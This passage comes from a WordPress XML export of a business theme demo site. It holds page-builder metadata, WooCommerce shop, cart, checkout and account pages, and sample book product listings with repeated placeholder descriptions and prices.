		<wp:meta_value><![CDATA[a:17:{s:17:"slider_revolution";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:14:"revslidertitle";i:1;s:9:"shortcode";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:33;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:33;s:19:"_inline_size_tablet";i:22;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;s:6:"margin";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:17;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:5:{s:3:"gap";i:8;s:16:"content_position";i:5;s:6:"layout";i:4;s:8:"overflow";i:1;s:15:"stretch_section";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:10;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:6:{s:6:"margin";i:1;s:13:"margin_tablet";i:1;s:14:"padding_tablet";i:2;s:14:"padding_mobile";i:8;s:7:"z_index";i:1;s:7:"padding";i:14;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:10:{s:21:"background_background";i:6;s:16:"background_color";i:1;s:19:"background_position";i:5;s:17:"background_repeat";i:5;s:15:"background_size";i:4;s:16:"background_image";i:5;s:15:"background_ypos";i:1;s:22:"background_size_tablet";i:1;s:26:"background_bg_width_tablet";i:1;s:26:"background_position_tablet";i:1;}s:26:"section_background_overlay";a:4:{s:24:"background_overlay_image";i:1;s:27:"background_overlay_position";i:1;s:25:"background_overlay_repeat";i:1;s:26:"background_overlay_opacity";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:6;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"icon_font";i:6;s:5:"title";i:6;s:3:"des";i:6;s:4:"link";i:6;}}s:5:"style";a:3:{s:17:"style_box_section";a:5:{s:15:"hover_animation";i:3;s:7:"icon_bg";i:3;s:19:"bg_hover_icon_color";i:3;s:16:"bg_hover_icon_bg";i:3;s:9:"des_color";i:3;}s:18:"style_icon_section";a:6:{s:10:"icon_space";i:6;s:13:"icon_bg_width";i:6;s:10:"radius_box";i:3;s:27:"icon_shadow_box_shadow_type";i:6;s:22:"icon_shadow_box_shadow";i:6;s:9:"icon_size";i:4;}s:21:"style_content_section";a:5:{s:18:"title_space_bottom";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:15:"title_space_top";i:3;}}s:8:"advanced";a:3:{s:14:"_section_style";a:3:{s:14:"_margin_tablet";i:2;s:8:"_padding";i:5;s:15:"_padding_tablet";i:2;}s:19:"_section_background";a:2:{s:22:"_background_background";i:3;s:17:"_background_color";i:3;}s:15:"_section_border";a:3:{s:14:"_border_radius";i:3;s:27:"_box_shadow_box_shadow_type";i:3;s:22:"_box_shadow_box_shadow";i:3;}}}}s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:4:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:12:"align_tablet";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:4:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;s:14:"_margin_tablet";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:7;s:5:"title";i:7;s:11:"header_size";i:7;s:5:"align";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:6;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:2:{s:14:"subtitle_style";i:7;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:3;s:10:"text_color";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:5:{s:4:"text";i:4;s:4:"link";i:4;s:5:"align";i:3;s:12:"align_mobile";i:2;s:9:"btn_style";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:3:{s:11:"img_spacing";i:1;s:32:"img_css_filters_hover_css_filter";i:1;s:32:"img_css_filters_hover_brightness";i:1;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}s:5:"style";a:2:{s:11:"style_title";a:3:{s:8:"bg_title";i:1;s:11:"title_color";i:1;s:12:"title_border";i:1;}s:13:"style_content";a:2:{s:10:"bg_content";i:1;s:13:"content_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}}}}s:13:"iiconbox_grid";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:10:"icon_boxes";i:1;}}s:5:"style";a:1:{s:17:"style_box_section";a:1:{s:11:"box_padding";i:1;}}}}s:16:"ifearuresservice";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:16:"fservice_section";a:2:{s:14:"fservice_lists";i:1;s:15:"fservice_height";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:1:{s:5:"title";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:6:{s:11:"title_color";i:1;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:13:"itestimonials";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:20:"section_testimonials";a:3:{s:12:"testi_slider";i:1;s:5:"tshow";i:1;s:4:"loop";i:1;}}}}s:8:"ipfilter";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:6:"filter";i:1;s:6:"column";i:1;s:11:"project_num";i:1;s:9:"load_more";i:1;s:5:"style";i:1;}}s:5:"style";a:1:{s:21:"overlay_style_section";a:6:{s:13:"overlay_align";i:1;s:8:"position";i:1;s:18:"overlay_background";i:1;s:9:"show_icon";i:1;s:13:"title_spacing";i:1;s:10:"cat_hcolor";i:1;}}}}s:8:"icounter";a:3:{s:5:"count";i:4;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:4;s:6:"number";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}s:5:"style";a:1:{s:21:"style_content_section";a:7:{s:28:"number_typography_typography";i:4;s:34:"number_typography_font_size_mobile";i:4;s:18:"title_space_mobile";i:4;s:27:"title_typography_typography";i:4;s:33:"title_typography_font_size_mobile";i:4;s:12:"number_color";i:4;s:11:"title_color";i:4;}}}}s:13:"ipostcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:8:"post_num";i:1;s:4:"dots";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Shop</title>
		<link>http://wpdemo.archiwp.com/maxbizz/shop/</link>
		<pubDate>Thu, 01 Oct 2020 10:12:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/shop/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1164</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:12:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:12:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[shop]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[1207]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Cart</title>
		<link>http://wpdemo.archiwp.com/maxbizz/cart/</link>
		<pubDate>Thu, 01 Oct 2020 10:12:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/cart/</guid>
		<description></description>
		<content:encoded><![CDATA[<!-- wp:shortcode -->
[woocommerce_cart]
<!-- /wp:shortcode -->]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1165</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:12:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:12:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[cart]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[page-templates/shop-page.php]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Checkout</title>
		<link>http://wpdemo.archiwp.com/maxbizz/checkout/</link>
		<pubDate>Thu, 01 Oct 2020 10:12:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/checkout/</guid>
		<description></description>
		<content:encoded><![CDATA[<!-- wp:shortcode -->
[woocommerce_checkout]
<!-- /wp:shortcode -->]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1166</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:12:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:12:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[checkout]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[page-templates/shop-page.php]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>My account</title>
		<link>http://wpdemo.archiwp.com/maxbizz/my-account/</link>
		<pubDate>Thu, 01 Oct 2020 10:12:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/my-account/</guid>
		<description></description>
		<content:encoded><![CDATA[<!-- wp:shortcode -->[woocommerce_my_account]<!-- /wp:shortcode -->]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1167</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:12:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:12:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[my-account]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														</item>
					<item>
		<title>Secrets of Strategy</title>
		<link>http://wpdemo.archiwp.com/maxbizz/product/secrets-of-strategy/</link>
		<pubDate>Thu, 01 Oct 2020 10:17:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=product&#038;p=1168</guid>
		<description></description>
		<content:encoded><![CDATA[A good leader gets things done; a great leader aspires, inspires, and achieves more. This book highlights the differences between good and great, and shows you how to bridge the chasm between getting things done and making things happen.Business is evolving at an increasingly rapid rate, and leaders must keep pace with the changes or risk stagnation. People work differently, are motivated differently, and have different expectations today—business as usual is quickly losing its effectiveness. The Leadership Challenge helps you stay current, relevant, and effective in the modern workplace.
<ul>
 	<li>Gain deep insight into leadership's critical role in organizational health</li>
 	<li>Navigate the shift toward team-oriented work relationships</li>
 	<li>Motivate and inspire to break through the pervasive new cynicism</li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[This book is the gold-standard manual for effective leadership, grounded in research and written by the premier authorities in the field. With deep insight into the complex interpersonal dynamics of the workplace.

This new sixth edition has been revised to address current challenges, and includes more international examples and a laser focus on business issues; you'll learn how extraordinary leaders accomplish extraordinary things.]]></excerpt:encoded>
		<wp:post_id>1168</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:17:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:17:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[secrets-of-strategy]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[product]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="product_cat" nicename="business"><![CDATA[Business]]></category>
		<category domain="product_cat" nicename="marketing"><![CDATA[Marketing]]></category>
		<category domain="product_type" nicename="simple"><![CDATA[simple]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[total_sales]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[taxable]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_class]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_manage_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_backorders]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_sold_individually]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_virtual]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_downloadable]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_limit]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_expiry]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[instock]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_average_rating]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_review_count]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_product_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[4.5.2]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_regular_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[59.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[59.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1268]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Digital Capital</title>
		<link>http://wpdemo.archiwp.com/maxbizz/product/digital-capital/</link>
		<pubDate>Thu, 01 Oct 2020 10:20:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=product&#038;p=1172</guid>
		<description></description>
		<content:encoded><![CDATA[A good leader gets things done; a great leader aspires, inspires, and achieves more. This book highlights the differences between good and great, and shows you how to bridge the chasm between getting things done and making things happen.Business is evolving at an increasingly rapid rate, and leaders must keep pace with the changes or risk stagnation. People work differently, are motivated differently, and have different expectations today—business as usual is quickly losing its effectiveness. The Leadership Challenge helps you stay current, relevant, and effective in the modern workplace.
<ul>
 	<li>Gain deep insight into leadership's critical role in organizational health</li>
 	<li>Navigate the shift toward team-oriented work relationships</li>
 	<li>Motivate and inspire to break through the pervasive new cynicism</li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[This book is the gold-standard manual for effective leadership, grounded in research and written by the premier authorities in the field. With deep insight into the complex interpersonal dynamics of the workplace.

This new sixth edition has been revised to address current challenges, and includes more international examples and a laser focus on business issues; you'll learn how extraordinary leaders accomplish extraordinary things.]]></excerpt:encoded>
		<wp:post_id>1172</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:20:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:20:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[digital-capital]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[product]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="product_cat" nicename="finance"><![CDATA[Finance]]></category>
		<category domain="product_type" nicename="simple"><![CDATA[simple]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_regular_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[39.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[total_sales]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[taxable]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_class]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_manage_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_backorders]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_sold_individually]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_virtual]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_downloadable]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_limit]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_expiry]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[instock]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_average_rating]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_review_count]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_product_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[4.5.2]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[39.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1271]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Leadership Challenge</title>
		<link>http://wpdemo.archiwp.com/maxbizz/product/leadership-challenge/</link>
		<pubDate>Thu, 01 Oct 2020 10:26:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=product&#038;p=1174</guid>
		<description></description>
		<content:encoded><![CDATA[A good leader gets things done; a great leader aspires, inspires, and achieves more. This book highlights the differences between good and great, and shows you how to bridge the chasm between getting things done and making things happen.Business is evolving at an increasingly rapid rate, and leaders must keep pace with the changes or risk stagnation. People work differently, are motivated differently, and have different expectations today—business as usual is quickly losing its effectiveness. The Leadership Challenge helps you stay current, relevant, and effective in the modern workplace.
<ul>
 	<li>Gain deep insight into leadership's critical role in organizational health</li>
 	<li>Navigate the shift toward team-oriented work relationships</li>
 	<li>Motivate and inspire to break through the pervasive new cynicism</li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[This book is the gold-standard manual for effective leadership, grounded in research and written by the premier authorities in the field. With deep insight into the complex interpersonal dynamics of the workplace.

This new sixth edition has been revised to address current challenges, and includes more international examples and a laser focus on business issues; you'll learn how extraordinary leaders accomplish extraordinary things.]]></excerpt:encoded>
		<wp:post_id>1174</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:26:38]]></wp:post_date>
